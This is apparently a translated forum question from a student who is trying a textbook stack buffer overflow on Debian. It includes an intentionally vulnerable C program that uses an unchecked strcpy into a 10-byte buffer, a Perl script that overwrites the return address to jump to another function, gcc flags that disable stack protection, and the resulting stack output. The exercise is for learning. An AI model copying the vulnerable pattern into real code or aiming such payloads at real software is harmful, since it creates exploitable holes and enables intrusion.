试验缓冲区溢出

我最近参加了一个安全课程，在该课程中我们简要介绍了缓冲区溢出。我对所涵盖的内容不满意，因此我寻找了一些可以跟进的示例，并尝试一下自己，发现缓冲区溢出攻击

我喜欢这个示例，因为它很容易理解和理解一切正常的原因。我尝试遵循，但是使用的是Debian虚拟机而不是Windows。

这是该站点的C代码：

#pragma check_stack(off)

#include <string.h>
#include <stdio.h> 

void foo(const char* input)
{
    char buf[10];

    printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n% p\n\n");

    strcpy(buf, input);
    printf("%s\n", buf);

    printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
}

void bar(void)
{
    printf("Augh! I've been hacked!\n");
}

int main(int argc, char* argv[])
{
    //Blatant cheating to make life easier on myself
    printf("Address of foo = %p\n", foo);
    printf("Address of bar = %p\n", bar);

    if (argc != 2) 
    {
        printf("Please supply a string as an argument!\n");
        return -1;
    } 

    foo(argv[1]);
    return 0;
}

通过提供两个函数foo和bar的地址，代码“作弊”。最终目标是仅使用缓冲区溢出来使bar运行。为此，他们给出了一个简短的Perl脚本：

$arg = "ABCDEFGHIJKLMNOP"."\x50\x10\x40";
$cmd = "StackOverrun ".$arg;
system($cmd);

由于我使用的是Linux而不是Windows，并且由于bar函数的地址略有不同，因此我做了几个简单的修复：

$arg = "ABCDEFGHIJKLMNOP"."\xf7\x05\x40";
$cmd = "./prog ".$arg;
system($cmd);

我认为它的工作方式应与他们的示例相同。运行Perl脚本，它将填充文本提供给程序，然后是要运行的新返回地址bar。但这对我不起作用。

这是运行我的Perl脚本的输出：

Address of foo: 0x400596
Address of bar: 0x4005f7
The current stack:
0x7fffe6b4abd8
0x7faba670c7a0
0x1d
0x6
0x7faba63b099a
0x7fffe6b4ad00

ABCDEFGHIJKLMNOPP�
Stack after input:
0x7ffc31998568
0x7f9a7c6ed7a0
0x7f9a7c421e50
0xf70550504f4e4d4c
0x7f9a7c39199a
0x7ffc31998690

在我的输出中，唯一包含任何填充文本的地址是最后一个地址的第三个地址，即最后一个地址，紧接在返回地址之前。

我怀疑问题出在使用gcc编译我的程序，但是我不确定到底是什么引起了它。问题也可能是Debian。这是我编译程序的方式：

gcc -z execstack -fno-stack-protector prog.c -o prog

我的希望是，没有堆栈保护程序的编译将使我能够按照示例进行操作，而不会出现问题。

任何帮助都会很棒，我完全被困住了。实际上，我可以简单地切换到Windows，但是在这一点上，我真的很想知道为什么它不起作用以及如何修复它。